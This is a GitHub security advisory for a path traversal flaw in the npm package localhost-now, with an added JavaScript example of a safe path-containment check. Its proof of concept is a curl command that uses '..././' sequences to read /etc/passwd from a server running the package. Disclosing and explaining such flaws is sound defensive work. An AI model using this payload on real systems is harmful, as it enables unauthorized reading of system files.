Path Traversal in localhost-now

High severity GitHub Reviewed Published Jun 11, 2019 to the GitHub Advisory Database • Updated Jan 9, 2023

Package

localhost-now (npm)

Affected versions

<= 1.0.2

Patched versions

None

Description

All versions of localhost-now are vulnerable to path traversal. This vulnerability is a bypass of the path traversal fix introduced in version 1.0.2.

Proof of concept:

$ curl -v --path-as-is "http://IP:5432/..././..././..././..././..././..././..././..././..././..././etc/passwd" 
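Added example, not code from localhost-now or from the advisory: a sketch of why the `..././` sequence in the proof of concept defeats a filter that deletes `../` in a single pass, next to a containment check that does not depend on stripping. The filter `naiveStrip`, the root `/srv/www` and all function names are assumptions; the advisory does not show the package's actual 1.0.2 fix.

```javascript
const path = require('node:path').posix; // posix flavour: same result on any OS

// Hypothetical weak filter (an assumption, not the package's code):
// deletes every "../" it finds, in one left-to-right pass.
function naiveStrip(requestPath) {
  return requestPath.replace(/\.\.\//g, '');
}

// What a server relying on that filter would end up opening.
function naiveResolve(root, requestPath) {
  return path.join(root, naiveStrip(requestPath));
}

// Containment check: never edit the input; resolve it, then verify the
// result is still under the served root. Returns null when it is not.
function safeResolve(root, requestPath) {
  let decoded;
  try {
    decoded = decodeURIComponent(requestPath);
  } catch (e) {
    return null; // malformed percent-encoding
  }
  if (decoded.includes('\0')) return null; // NUL bytes never belong in a path
  const rootAbs = path.resolve(root);
  const target = path.join(rootAbs, decoded);
  const rel = path.relative(rootAbs, target);
  if (rel === '..' || rel.startsWith('../') || path.isAbsolute(rel)) return null;
  return target;
}

// Constructed inputs; the first mirrors the shape of the advisory's PoC path.
const ROOT = '/srv/www';
const samples = ['/..././..././etc/passwd', '/%2e%2e/%2e%2e/etc/passwd', '/index.html'];
for (const p of samples) {
  console.log(p, '| naive:', naiveResolve(ROOT, p), '| safe:', safeResolve(ROOT, p));
}
```

Removing the inner `../` from each `..././` leaves a fresh `../` behind, so the stripping step itself produces the traversal. The check above is lexical only; symlinks inside the root would additionally need an `fs.realpath` comparison.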

Recommendation

No fix is currently available for this vulnerability. It is our recommendation to not install or use this module until a fix is available.

References

Reviewed Jun 11, 2019
Published to the GitHub Advisory Database Jun 11, 2019
Last updated Jan 9, 2023

Severity

High

Weaknesses

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Learn more on MITRE.

CVE ID

No known CVE

GHSA ID

GHSA-73cw-jxmm-qpgh

Source code

No known source code